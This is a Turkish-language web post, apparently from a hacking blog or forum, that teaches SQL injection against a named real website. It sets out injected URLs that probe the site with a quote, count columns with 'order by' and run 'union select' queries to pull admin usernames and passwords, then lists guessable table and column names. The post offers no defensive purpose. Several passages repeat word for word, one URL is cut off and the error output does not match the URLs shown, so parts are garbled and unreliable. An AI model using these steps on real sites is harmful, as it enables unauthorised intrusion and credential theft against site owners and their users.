Merhaba arkadaşlar
Bugün Sizlere SQL Açığı bulma ve id ve pass bilgileri çekme göstereceğim.
Konuya başlamadan biraz SQL hakkında bilgi verelim.
SQL (Structured Query Language) açığı bulunan sitelerden database'sinden id ve pass bilgilerini çekmedir, ve en çok kullanılan açıktı çünkü kolay bir açıktır.
id=değer", "search=değer" gibi değerler Url'da bulunması gerekmektedir.
Öncelikle hedef bir site belirleyelim.
http://www.soaw.org/
Şimdi bu adresi google ile arama yapıp değerleri bulacağız//Tarattık
http://www.soaw.org/article.php?id=205
Şimdi Sql açığı varmı kontrol edelim.
Bunu nasıl yapacağız ?
php?id=1 değerden sonra ' veya 'b komutu veriyoruz.
http://www.soaw.org/article.php?id=205'a
Evet gördüğünüz gibi sql hatası verdi şimdi gelelim id ve pass bulmaya
Evet 2dk bulduğumuz açığı sql inj. yaparak kolon ve admin giriş bilgilerini çekebiliriz.
Şimdi site adresine order+by+1 ekliyoruz.
http://www.soaw.org/article.php?id+order+by+1
Hata alana kadar devam arkadaşlar
http://www.soaw.org/article.php?id+order+by+2
Kolon sayısını bulduk hatamızı aldık ve Hata Şu ;
Microsoft JET Database Engine error ’80040e14’
The Microsoft Jet database engine does not recognize ’10’ as a valid field name or expression.
/news.asp, line 7
hatamiz budur arkadaşlar.
http://www.soaw.org/article.php?id+order+by+10
[Ama hemen bulamayabiliriz örnek 10 dedim.]
+union+select+0,1,2,3,4,5,6,7+from+TabloAdı şeklinde deneyerek ulaşacağız tablo adımıza...
Örnek ;
Bunu nasıl yapacağız ?
php?id=1 değerden sonra ' veya 'b komutu veriyoruz.
http://www.soaw.org/article.php?id=205'a
Evet gördüğünüz gibi sql hatası verdi şimdi gelelim id ve pass bulmaya
Evet 2dk bulduğumuz açığı sql inj. yaparak kolon ve admin giriş bilgilerini çekebiliriz.
Şimdi site adresine order+by+1 ekliyoruz.
http://www.soaw.org/article.php?id+order+by+1
Hata alana kadar devam arkadaşlar
http://www.soaw.org/article.php?id+order+by+2
Kolon sayısını bulduk hatamızı aldık ve Hata Şu ;
Microsoft JET Database Engine error ’80040e14’
The Microsoft Jet database engine does not recognize ’10’ as a valid field name or expression.
/news.asp, line 7
hatamiz budur arkadaşlar.
Devam Edilim....
[Ama hemen bulamayabiliriz örnek 10 dedim.]
+union+select+0,1,2,3,4,5,6,7+from+TabloAdı şeklinde deneyerek ulaşacağız tablo adımıza...
Örnek ;
http://www.pasificsql.com/news.asp?i...,5,6+from+User
Hata alamadık diye korkmayın şunları deneyin
Tablo Adları ;
admin,admins,user,users,new,news
5 yerine username
6 yerine password
Yazalım.
Hata alamadık diye korkmayın şunları deneyin
Tablo Adları ;
admin,admins,user,users,new,news
5 yerine username
6 yerine password
Yazalım.
Username ve password birşey olduğu o zaman isimler farklı olabilir şunları deneyin ;
username yerine;
usname,name,uname olabilir.
password yerine;
upass,pas, olabilir. deneyerek ulaşabilirsiniz...
Yorum Gönder